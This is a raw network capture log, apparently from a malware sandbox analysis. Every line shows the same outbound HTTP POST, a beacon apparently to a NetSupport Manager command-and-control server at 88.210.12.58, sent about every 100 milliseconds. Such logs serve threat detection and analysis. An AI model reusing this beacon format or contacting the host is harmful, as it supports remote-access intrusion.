Dec 10, 2024 08:58:53.162867069 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.263011932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.363995075 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.464711905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.564987898 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.666870117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.764987946 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.864983082 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.965009928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.066047907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.167097092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.268014908 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.368139029 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.468132019 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.569001913 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.670006037 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.770005941 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.871876955 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:54.971642017 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.072717905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.176565886 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.274787903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.373991013 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.474756956 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.574975014 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.674972057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.776707888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.876147985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:55.977041960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:56.299114943 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:56.546129942 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:56.657285929 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:56.757983923 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:56.858537912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:56.958749056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.057991028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.158793926 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.258980989 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.359038115 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.463720083 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.562824965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.662780046 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.762795925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.862006903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:57.963021040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:58.064009905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:58.164098024 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:58.264034033 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:58.364996910 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:58.466042042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:58.565973043 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:58.667048931 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:58.767199039 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.090548992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.194408894 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.296710968 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.413954973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.517208099 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.617072105 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.717035055 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.819761038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:59.918068886 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.018996000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.119081974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.220021963 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.320993900 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.421015978 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.521004915 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.621001005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.721013069 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.822084904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:00.924714088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.023993015 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.124725103 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.228720903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.328723907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.424984932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.525006056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.628710032 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.728040934 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.828715086 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:01.931051016 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.032103062 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.133034945 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.233023882 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.334122896 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.435101986 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.535007000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.635006905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.735016108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.836060047 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:02.936003923 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.037029028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
